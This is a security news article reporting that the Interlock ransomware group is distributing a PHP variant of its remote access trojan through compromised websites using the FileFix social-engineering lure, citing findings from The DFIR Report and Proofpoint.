A new version of the Interlock ransomware group’s RAT is being distributed via compromised websites using a variant of the ClickFix attack, security researchers warn.
A social engineering technique, ClickFix relies on malicious code injected into web pages to trick visitors into executing malicious code on their systems under the disguise of performing an update, resolving an error, or verifying they are humans.
FileFix is a variant of the attack in which a prompt notifies the user that a file has been shared with them, and a fake ‘Open File Explorer’ button on the page automatically launches File Explorer and copies PowerShell code to the clipboard.
The victim is then instructed to find the shared file using File Explorer’s address bar by pasting the file’s path and pressing Enter. This, however, leads to the execution of a malicious file, as security researcher mr.d0x reported.
Starting May 2025, The DFIR Report and Proofpoint observed Interlock RAT distribution activity associated with KongTuke (aka LandUpdate808), a sophisticated traffic distribution system (TDS) that leads to malware infections though a multi-stage process that involves fake captcha lures.
The KongTuke web injections recently transitioned from ClickFix to FileFix attacks and started distributing a PHP variant of the Interlock RAT in early June, The DFIR Report explains. In some cases, the Node.js variant of the malware was delivered.
Upon execution, the RAT begins fingerprinting the system, using PowerShell commands to harvest and exfiltrate system information. It also checks the privileges the logged-in user has on the system.
Interlock RAT (linked to NodeSnake RAT) establishes persistence using a run key, and allows the attackers to supply it with commands to be executed. In fact, The DFIR Report has observed strong evidence of hands-on-keyboard activity from the threat actors.
For command-and-control (C&C) communication, the malware relies on trycloudflare.com URLs, abusing the legitimate Cloudflare Tunnel service to hide its C&C.
The security researchers also observed the use of RDP for lateral movement within the compromised environments, and note that the hackers were seen targeting multiple industries, concluding that the campaign is likely opportunistic.
“This discovery highlights the continued evolution of the Interlock group’s tooling and their operational sophistication. While the Node.js variant of Interlock RAT was known for its use of Node.js, this variant leverages PHP, a common web scripting language, to gain and maintain access to victim networks,” The DFIR Report notes.
Related: Chinese Hackers Target Chinese Users With RAT, Rootkit
Related: Ransomware Gang Leaks Alleged Kettering Health Data
Related: Two People Arrested in Australia and US for Development and Sale of Hive RAT
Related: Ransomware Group Takes Credit for National Presto Industries Attack
